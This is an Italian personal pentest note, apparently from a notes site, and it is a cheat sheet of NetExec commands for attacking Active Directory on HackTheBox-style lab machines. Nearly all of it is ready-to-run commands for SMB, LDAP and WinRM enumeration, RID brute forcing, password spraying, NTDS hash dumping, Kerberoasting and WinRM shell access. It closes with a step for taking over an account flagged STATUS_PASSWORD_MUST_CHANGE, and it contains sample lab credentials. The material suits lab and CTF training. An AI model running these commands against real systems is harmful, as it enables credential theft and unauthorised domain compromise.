Quartz 4

NetExec (NXC)

3 min read

tags: NetExec nxc Hacking_Active_Directory

Tramite questo software è possibile enumerare e ottenere informazioni su una macchina che utilizza Active Directory, si può enumerare il servizio SMB, Ldap, ecc.

Puoi utilizzare sia il dominio in questo caso cicada.htb oppure direttamente l’indirizzo IP.

 
sudo apt install netexec 
 
#Prima prova il comando più generico possibile
 
nxc smb <IP>
 
#Enumerazione SMB senza nome utente e password
 
nxc smb cicada.htb -u '' -p ''
 
#Enumerazione Cartelle condivise senza password
 
nxc smb <IP> -u '' -p '' --shares
 
#Verificare la policy per la password, se Account Lockout Threshold è "None", puoi fare bruteforce aggressivo. Se è "3", devi stare attentissimo.
 
nxc smb <IP> --pass-pol
 
#Enumerazione con password sbagliata che ci restituisce il nome utente
 
nxc smb cicada.htb -u '' -p 'ffafafafafa'
 
#Una volta trovato il nome utente possiamo enumerare le cartelle condivise
 
nxc smb cicada.htb -u 'Guest' -p '' --shares
 
nxc smb <IP> -u Utente -p 'Password' --shares
 
#Se il nostro utente può enumerare gli altri utenti possiamo utilizzare
 
nxc smb cicada.htb -u 'Guest' -p '' --users
 
nxc smb cicada.htb -u 'Guest' -p 'Password' --users
 
#Per fare un bruteforce degli utenti utilizzare il seguente comando:
 
nxc smb cicada.htb -u 'Guest' -p '' --rid-brute
 
#Se hai una lista di nomi utenti e una password puoi fare uno spraying attack
 
nxc smb cicada.htb -u 'users.txt' -p 'passwod123' --continue-on-success
 
#Dumpa tutti gli hash degli utenti:
 
nxc smb 10.129.234.71 -u Caroline.Robinson -p 'Panino1234!' --ntds 
 
#Enumerazione Ldap senza nome utente e password
 
nxc ldap cicada.htb -u '' -p ''
 
#Se il nostro utente può enumerare gli altri utenti possiamo utilizzare
 
nxc ldap cicada.htb -u 'micael.spaadne' -p 'password12334' --users
 
#Enumerazione winrm senza nome utente e password
 
nxc winrm cicada.htb -u '' -p ''
 
#Se troviamo un utente possiamo verificare se sia possibile ottenere una shell su quel utente tramite winrm, se vediamo (Pwn3d!) significa che è possibile
 
nxc winrm cicada.htb -u 'emily.oscar' -p 'paninoapnie'
 
#Controlla se ci sono account di servizio vulnerabili a Kerberoasting
 
nxc ldap <IP> -u Utente -p 'Password' --kerberoasting output.txt
 
#Una volta ottenute le credenziali possiamo connetterci tramite:
 
evil-winrm -i 10.10.1.1. -u 'emily.oscar' -p 'paninoapnie'

STATUS_PASSWORD_MUST_CHANGE

Se trovi un utente che restituisce questo output:

SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

Hai praticamente trovato accesso a quell’utente perchè ti basta cambiare la password dell’utente per poi entrare, per farlo usa il seguente comando:

smbpasswd -r 10.129.234.71 -U Caroline.Robinson

Poi inserisci la vecchia password e la nuova password.

E ti connetti tramite:

evil-winrm -i 10.129.234.71 -u Caroline.Robinson -p 'Panino1234!'

Graph View